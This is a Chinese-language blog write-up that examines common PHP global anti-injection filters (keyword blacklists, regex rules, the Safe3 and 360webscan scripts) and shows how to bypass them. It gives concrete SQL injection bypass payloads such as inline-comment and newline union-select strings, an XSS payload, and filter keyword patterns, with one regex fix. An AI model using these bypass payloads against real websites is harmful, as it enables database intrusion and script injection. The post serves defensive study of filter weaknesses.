PHP代碼層防護與繞過

0x01 前言

　　在一些網站通常會在公用文件引入全局防護代碼進行SQL注入、XSS跨站腳本等漏洞的防御，在一定程度上對網站安全防護還是比較有效的。

　　這里討論一下關鍵字過濾不完善及常見正則匹配存在的問題，並收集了網絡上常見的PHP全局防護代碼進行分析。

　　Bypass思路：只考慮關鍵字被過濾如何進行Bypass的問題，暫不考慮關鍵字替換繞過的情況。

0x02 關鍵字過濾

1、使用strpos過濾關鍵字

PHP過濾代碼如下:

<?php
$str = "and|or|union|select|from|where|limit|order by|guoup by|<script>|</script>";
$arr=explode("|",$str);
#print_r($arr);
foreach($arr as $key=>$val){
$flag=strpos($_GET['id'],$val);
if ($flag){
    echo 'Error';
    exit();
}
}
?>

Bypass思路：strpos() 函數查找字符串在另一字符串中第一次出現的位置。strpos() 函數對大小寫敏感。

　　　　　　id=1 AND 1=1 UNION SELECT 1，2，3  FROM ADMIN

2、使用stripos，進行關鍵字過濾

　  與strpos相比，stripos() - 查找字符串在另一字符串中第一次出現的位置（不區分大小寫）

PHP過濾代碼如下:

<?php
$str = "and|or|union|select|from|where|limit|order by|guoup by|<script>|</script>";
$arr=explode("|",$str);
#print_r($arr);
foreach($arr as $key=>$val){
$flag=strpos($_GET['id'],$val);
if ($flag){
    echo 'Error';
    exit();
}
}
?>

Bypass思路：

　　　　當$flag等於0，即關鍵字在輸入參數的第一位，可繞過

　　　　id=</script><a href="javascript:alert(/xss/)">xsstest<a>

關鍵字過濾類似的方法：

<?php
$blacklist_keywords = 'select,from,1=1,--,union,#';
$blacklist = explode(',',$blacklist_keywords);
print_r($blacklist);
foreach($blacklist as $key=>$value){
    //$_REQUEST['id'] = str_replace(strtolower($value),'',strtolower($_REQUEST['id']));               
    $_REQUEST['id'] = str_replace($value,'',$_REQUEST['id']);
}
echo $_REQUEST['id'];

?>

0x03 正則匹配

1、邊界關鍵詞

\b 表示單詞的邊界，因此只有獨立的 "union" 單詞會被匹配

PHP過濾代碼如下:

<?php
if  (preg_match("/\b(union|select|from)\b/i",$_GET['id'])==1){ 
    echo "Error";
    exit();
}
echo "success" ;
?>

Bypass思路：

　　通過數據庫的特性，在關鍵字前后添加字符，打擾關鍵字邊界判斷

　　id=1e0union/*!12345select*/1,2,3,4/*!12345from*/users

2、匹配模式

　　i 忽略大小寫，匹配不考慮大小寫，默認不匹配多行

PHP過濾代碼如下:

<?php
if  (preg_match("/(?:(union(.*?)select))/i",$_GET['id'])==1){ 
    echo "Error";
    exit();
}
echo "success" ;
?>

 Bypass思路：

　　通過換行 \n可繞過，url編碼為%0a

　　id=1 union%23%0aseleCT 1,2,3,4 from users

修復方案：

　　preg_match("/(?:(union(.*?)select))/ims",$_GET['id'])

0x03 PHP通用防護代碼

1、safe3 防注入代碼

<?php
//Code By Safe3 
ini_set('date.timezone','Asia/Shanghai');
function customError($errno, $errstr, $errfile, $errline)
{
    echo "<b>Error number:</b> [$errno],error on line $errline in $errfile<br />";
    die();
}
set_error_handler("customError",E_ERROR);
$getfilter="'|select|from|(and|or)\\b.+?(>|<|=|in|like)|\\/\\*.+?\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)";
$postfilter="\\b(and|or)\\b.{1,6}?(=|>|<|\\bin\\b|\\blike\\b)|\\/\\*.+?\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)";
$cookiefilter="\\b(and|or)\\b.{1,6}?(=|>|<|\\bin\\b|\\blike\\b)|\\/\\*.+?\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)";
function StopAttack($StrFiltKey,$StrFiltValue,$ArrFiltReq){

    if(is_array($StrFiltValue))
    {
        $StrFiltValue=implode($StrFiltValue);
    }
    if (preg_match("/".$ArrFiltReq."/is",$StrFiltValue)==1){
        slog("<br><br>操作IP: ".$_SERVER["REMOTE_ADDR"]."<br>操作時間: ".strftime("%Y-%m-%d %H:%M:%S")."<br>操作頁面:".$_SERVER["PHP_SELF"]."<br>提交方式: ".$_SERVER["REQUEST_METHOD"]."<br>提交參數: ".$StrFiltKey."<br>提交數據: ".$StrFiltValue);
        @header("http/1.1 404 not found"); 
        print "<html><title>404: Not Found</title>";
        //slog("<br><br>操作IP: ".$_SERVER["REMOTE_ADDR"]."<br>操作時間: ".strftime("%Y-%m-%d %H:%M:%S")."<br>操作頁面:".$_SERVER["PHP_SELF"]."<br>提交方式: ".$_SERVER["REQUEST_METHOD"]."<br>提交參數: ".$StrFiltKey."<br>提交數據: ".$StrFiltValue);
        print "<body>Url里含有非法字符串,屬於有誤操作!...　<a href='/'>您還可以返回首頁</a></body></html>";
  ;exit();
    }
}
//$ArrPGC=array_merge($_GET,$_POST,$_COOKIE);
foreach($_GET as $key=>$value){
    StopAttack($key,$value,$getfilter);
}
foreach($_POST as $key=>$value){
    StopAttack($key,$value,$postfilter);
}
foreach($_COOKIE as $key=>$value){
    StopAttack($key,$value,$cookiefilter);
}
function slog($logs)
{
    $toppath=$_SERVER["DOCUMENT_ROOT"]."/log.htm";
    $Ts=fopen($toppath,"a+");
    fputs($Ts,$logs."\r\n");
    fclose($Ts);
}
?>

如果正面懟正則，實在想不到繞過的方式。。。。 

 

2、360webscan防御腳本

　　360網站安全：http://webscan.360.cn

　　http://webscan.360.cn/protect/index/?act=reinstall&domain=www.test.com下載漏洞修復插件360webscan.zip  多次下載解壓失敗，

　　無奈，跑到cmseasy下載最新版cms，解壓獲取 webscan360/360safe目錄，分享到網盤，鏈接: https://pan.baidu.com/s/1nviNi2l 密碼: 3itq

　　WEBSCAN_VERSION ：0.1.3.2

 

SQL語句測試，成功攔截： 

Bypass思路：

　　關鍵的兩個正則：

　　UNION.+?SELECT\s*(\(.+\)\s*|@{1,2}.+?\s*|\s+?.+?|(`|'|\").*?(`|'|\")\s*)

　　(SELECT|DELETE)@{0,2}(\\(.+\\)|\\s+?.+?\\s+?|(`|'|\").*?(`|'|\"))FROM(\\(.+\\)|\\s+?.+?|(`|'|\").*?(`|'|\"))

　　id=1e0union select!1,user(),3,4 from users

關於我：一個網絡安全愛好者，致力於分享原創高質量干貨，歡迎關注我的個人微信公眾號：Bypass--，瀏覽更多精彩文章。

 

參考地址:

　　PHP preg_replace() 正則替換所有符合條件的字符串　　http://www.jb51.net/article/46458.htm

　　360webscan防火牆的防御與繞過　　　　　　　　　　 https://tieba.baidu.com/p/3813928365?red_tag=2255813250

　　PHP跨站腳本攻擊(XSS)漏洞修復方法（一）　　　　   https://zhangge.net/4965.html